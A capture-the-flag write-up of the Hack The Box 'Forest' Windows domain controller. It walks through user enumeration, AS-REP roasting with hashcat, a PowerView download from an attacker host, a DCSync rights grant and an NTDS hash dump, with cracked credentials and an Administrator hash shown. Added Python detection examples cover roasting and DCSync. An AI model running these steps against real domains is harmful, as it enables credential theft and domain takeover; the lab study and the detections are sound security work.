Forest

Operating system | Difficulty | Release date | Creator |
---|---|---|---|
Windows | Easy | 12 October 2019 | egre55 & mrb3n8132 |
Port scan
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.161
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 21:36 -03
Initiating SYN Stealth Scan at 21:36
Scanning 10.10.10.161 [65535 ports]
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Discovered open port 49930/tcp on 10.10.10.161
Discovered open port 5985/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 9389/tcp on 10.10.10.161
Discovered open port 49676/tcp on 10.10.10.161
Discovered open port 49666/tcp on 10.10.10.161
Discovered open port 49684/tcp on 10.10.10.161
Discovered open port 49665/tcp on 10.10.10.161
Discovered open port 49677/tcp on 10.10.10.161
Discovered open port 49671/tcp on 10.10.10.161
Discovered open port 47001/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 49667/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 49664/tcp on 10.10.10.161
Discovered open port 49703/tcp on 10.10.10.161
Completed SYN Stealth Scan at 21:36, 19.47s elapsed (65535 total ports)
Nmap scan report for 10.10.10.161
Host is up, received user-set (0.16s latency).
Scanned at 2025-04-10 21:36:01 -03 for 20s
Not shown: 65341 closed tcp ports (reset), 170 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49676/tcp open unknown syn-ack ttl 127
49677/tcp open unknown syn-ack ttl 127
49684/tcp open unknown syn-ack ttl 127
49703/tcp open unknown syn-ack ttl 127
49930/tcp open unknown syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.57 seconds
Raw packets sent: 94146 (4.142MB) | Rcvd: 68268 (2.731MB)
Version and service enumeration
nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49684,49703,49930 -oN servicesScan 10.10.10.161
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 21:36 -03
Nmap scan report for 10.10.10.161 (10.10.10.161)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-11 00:47:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49930/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-11T00:47:54
|_ start_date: 2025-04-08T05:55:54
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h30m17s, deviation: 4h02m32s, median: 10m15s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2025-04-10T17:47:55-07:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.68 seconds
Initial exploitation
echo '10.10.10.161 htb.local FOREST.htb.local' >> /etc/hosts
rpcclient 10.10.10.161 -U '' -N -c 'enumdomusers' | awk '{print $1}' | awk -F: '{print $2}' | tr -d '[|]'
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi
john
TSSP
ax
tester
admin
warhome
root@kali:/home/d4redevil/htb/Forest/content# kerbrute userenum -d htb.local --dc 10.10.10.161 users.txt
Version: v1.0.3 (9dad6e1) - 04/10/25 - Ronnie Flathers @ropnop
2025/04/10 21:41:57 > Using KDC(s):
2025/04/10 21:41:57 > 10.10.10.161:88
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailboxc3d7722@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailboxfc9daad@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailboxc0a90c9@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox83d6781@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailboxb01ac64@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox670628e@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox6ded678@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox7108a4e@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailboxfd87238@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox968e74d@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox0659cc1@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: svc-alfresco@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: mark@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: lucinda@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: sebastien@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: andy@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: santi@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: john@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: TSSP@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: ax@htb.local
2025/04/10 21:41:58 > [+] VALID USERNAME: warhome@htb.local
2025/04/10 21:41:58 > [+] VALID USERNAME: admin@htb.local
2025/04/10 21:41:58 > [+] VALID USERNAME: tester@htb.local
We check whether any of the users has the Kerberos PRE-AUTH attribute set (that is, the account does not require Kerberos pre-authentication), which is what makes the AS-REP hash below obtainable:
$krb5asrep$23$svc-alfresco@HTB.LOCAL:68163eb0eb17db3cc537cae37fe5c84f$297be12ce7dee3df6e90b8aa1d916a78597fd573fe4217c7ca925255c323cced7ce284b0b50625bb1445d9ea3f6893345f81ffdbcc9df5ec224e6a60aab3adffd1d0b65a5566166ab74619ab5f23c3fedcd0c166ffcc58ad2d49b1782903ad5777e00aeb7ace06d4f7466527b1439de39d3daa75d4ca670eba3a8536747fc8e9277b4cc547c2ca61218bea9411a31683fd091656f1e3c9a7a22433c8b5833461d2dad9b63fada2f8cf139f426f5c38575aead6872981fff78aef905ae4d5508ed9c78d02093d25288cd86bb2a9980c44fb3f65fdfb6ef1064683a605744c074d483a751f2153
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
[!warning] Credentials
User: svc-alfresco
Password: s3rvice
Service/Application:
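As an added detection example (not part of the original writeup): the account above was exposed because it does not require Kerberos pre-authentication, and on the domain controller that shows up in Security event 4768 as a TGT issued with PreAuthType 0 and, when a roasting tool asks for it, RC4 (0x17) ticket encryption. The script below runs that check over a few constructed 4768 records; the key=value rendering of the event and the sample names and addresses are assumptions.

```python
# Added example (not from the original writeup): flag AS-REP roasting
# candidates in Windows Security event 4768 (Kerberos TGT requested).
# An account set to not require pre-authentication produces a successful
# TGT request with PreAuthType 0; roasting tools additionally ask for an
# RC4 (0x17) ticket so the AS-REP can be cracked offline (hashcat -m 18200).
from dataclasses import dataclass

@dataclass
class Tgt4768:
    target_user: str
    pre_auth_type: int     # 0 = no pre-auth, 2 = PA-ENC-TIMESTAMP
    ticket_enc_type: int   # 0x17 = RC4-HMAC, 0x12 = AES256-CTS-HMAC-SHA1-96
    status: int            # 0x0 = ticket issued, anything else = failure
    ip_address: str

def parse_4768(line: str) -> Tgt4768:
    """Parse a constructed 'key=value;...' rendering of a 4768 event."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split(";"))
    return Tgt4768(
        target_user=fields["TargetUserName"],
        pre_auth_type=int(fields["PreAuthType"]),
        ticket_enc_type=int(fields["TicketEncryptionType"], 16),
        status=int(fields["Status"], 16),
        ip_address=fields["IpAddress"],
    )

def is_asrep_roast_candidate(ev: Tgt4768) -> bool:
    """True when a TGT was issued without pre-auth and encrypted with RC4."""
    return ev.status == 0 and ev.pre_auth_type == 0 and ev.ticket_enc_type == 0x17

# Constructed sample events; names and addresses are illustrative only.
SAMPLE_LOG = """
TargetUserName=svc-alfresco;PreAuthType=0;TicketEncryptionType=0x17;Status=0x0;IpAddress=10.10.14.2
TargetUserName=sebastien;PreAuthType=2;TicketEncryptionType=0x12;Status=0x0;IpAddress=10.10.10.50
TargetUserName=FOREST$;PreAuthType=2;TicketEncryptionType=0x12;Status=0x0;IpAddress=10.10.10.161
TargetUserName=lucinda;PreAuthType=0;TicketEncryptionType=0xFFFFFFFF;Status=0x12;IpAddress=10.10.14.2
""".strip().splitlines()

def find_asrep_roasting(lines):
    """Return (user, source address) for every record matching the pattern."""
    events = [parse_4768(line) for line in lines]
    return [(e.target_user, e.ip_address) for e in events if is_asrep_roast_candidate(e)]

if __name__ == "__main__":
    for user, ip in find_asrep_roasting(SAMPLE_LOG):
        print(f"AS-REP roast candidate: {user} requested from {ip}")
```

A real pipeline would read the 4768 XML from the Security log rather than the key=value rendering used here; the fix on the account side is to clear "Do not require Kerberos preauthentication" and to stop issuing RC4 tickets where the environment allows it.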
root@kali:/home/d4redevil/htb/Forest/content/ldap# ldapdomaindump -u 'htb.local\svc-alfresco' -p 's3rvice' 10.10.10.161
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
We enumerate with BloodHound
root@kali:/home/d4redevil/htb/Forest/content/bloodhound# bloodhound-python -u 'svc-alfresco' -p 's3rvice'
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 38 users
INFO: Found 76 groups
INFO: Found 2 gpos
INFO: Found 15 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: EXCH01.htb.local
INFO: Querying computer: FOREST.htb.local
WARNING: Failed to get service ticket for FOREST.htb.local, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 55S
INFO: Compressing output into 20250410221055_bloodhound.zi
The user SVC-ALFRESCO@HTB.LOCAL is the owner of the user WARHOME@HTB.LOCAL.
Object owners retain the ability to modify the security descriptor of their objects, regardless of the permissions in the object's DACL.
We change the password of the Admin user.
We upload PowerView.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> iwr -uri http://10.10.14.2/PowerView.ps1 -o PowerView.ps1
Privilege escalation to root/SYSTEM
Members of the group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL have permission to modify the DACL (Discretionary Access Control List) on the domain HTB.LOCAL.
With write access to the target object's DACL, one can grant oneself whatever privileges one wants over the object.
We use the following command to assign DCSync privileges to our account.
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\tester', $SecPassword)
Add-ObjectACL -PrincipalIdentity tester -Credential $Cred -Rights DCSync
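As an added detection example (not part of the original writeup) covering both the owner/WriteDacl abuse described above and the DCSync rights granted with PowerView: on the domain controller the DACL rewrite appears as Security event 5136 on the attribute nTSecurityDescriptor, and the replication itself as event 4662 with control access on the DS-Replication-Get-Changes GUIDs. The key=value rendering of the events, the sample accounts, the placeholder GUID and the DC allow-list are assumptions.

```python
# Added example (not from the original writeup): detect the chain shown
# above from Windows Security events. A 5136 that writes nTSecurityDescriptor
# is an ACL/owner change on an AD object; a 4662 with control access
# (AccessMask 0x100) on the replication GUIDs is what DCSync looks like.
from collections import defaultdict

DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}
DC_ACCOUNTS = {"FOREST$"}   # assumed allow-list: DCs replicate legitimately

def parse_event(line):
    """Parse a constructed 'EventID;key=value;...' rendering of one event."""
    parts = line.strip().split(";")
    ev = {"EventID": int(parts[0])}
    ev.update(kv.split("=", 1) for kv in parts[1:])
    return ev

def is_dacl_write(ev):
    """5136: the object's security descriptor (DACL or owner) was rewritten."""
    return (ev["EventID"] == 5136
            and ev.get("AttributeLDAPDisplayName", "").lower() == "ntsecuritydescriptor")

def is_dcsync(ev):
    """4662 control access on a replication GUID by a non-DC principal."""
    if ev["EventID"] != 4662 or not int(ev["AccessMask"], 16) & 0x100:
        return False
    guids = set(ev["Properties"].lower().split(","))
    return bool(guids & REPLICATION_GUIDS) and ev["SubjectUserName"] not in DC_ACCOUNTS

def find_dacl_writes(lines):
    """Map each account to the DNs whose security descriptor it rewrote."""
    writes = defaultdict(set)
    for ev in map(parse_event, lines):
        if is_dacl_write(ev):
            writes[ev["SubjectUserName"]].add(ev["ObjectDN"])
    return {user: sorted(dns) for user, dns in writes.items()}

def find_dcsync(lines):
    """Return (account, objects it re-ACLed beforehand) for each DCSync."""
    writes = find_dacl_writes(lines)
    return [(ev["SubjectUserName"], writes.get(ev["SubjectUserName"], []))
            for ev in map(parse_event, lines) if is_dcsync(ev)]

# Constructed sample events; accounts and the all-zero GUID are illustrative.
SAMPLE_LOG = """
5136;SubjectUserName=svc-alfresco;ObjectDN=CN=warhome,CN=Users,DC=htb,DC=local;AttributeLDAPDisplayName=nTSecurityDescriptor
5136;SubjectUserName=tester;ObjectDN=DC=htb,DC=local;AttributeLDAPDisplayName=nTSecurityDescriptor
4662;SubjectUserName=FOREST$;AccessMask=0x100;Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2,1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
4662;SubjectUserName=tester;AccessMask=0x100;Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2,1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
4662;SubjectUserName=tester;AccessMask=0x20;Properties=00000000-0000-0000-0000-000000000000
""".strip().splitlines()
```

In a real 4662 the Properties field is multi-line with braces around each GUID, so a production rule normalises it before the set test; the hardening on this box is to restrict the WriteDacl that the Exchange Windows Permissions group holds on the domain object and to alert on any 5136 for nTSecurityDescriptor at that DN.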
Dumping the NTDS.dit database
root@kali:/home/d4redevil/htb/Forest/content# nxc smb 10.10.10.161 -u 'tester' -p 'Password123!' --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\tester:Password123!
SMB 10.10.10.161 445 FOREST [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.161 445 FOREST [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.161 445 FOREST htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
SMB 10.10.10.161 445 FOREST [+] Dumped 39 NTDS hashes to /root/.nxc/logs/FOREST_10.10.10.161_2025-04-10_233555.ntds of which 36 were added to the database
SMB 10.10.10.161 445 FOREST [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.10.10.161 445 FOREST [*] cat /root/.nxc/logs/FOREST_10.10.10.161_2025-04-10_233555.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.10.10.161 445 FOREST [*] grep -iv disabled /root/.nxc/logs/FOREST_10.10.10.161_2025-04-10_233555.ntds | cut -d ':' -f1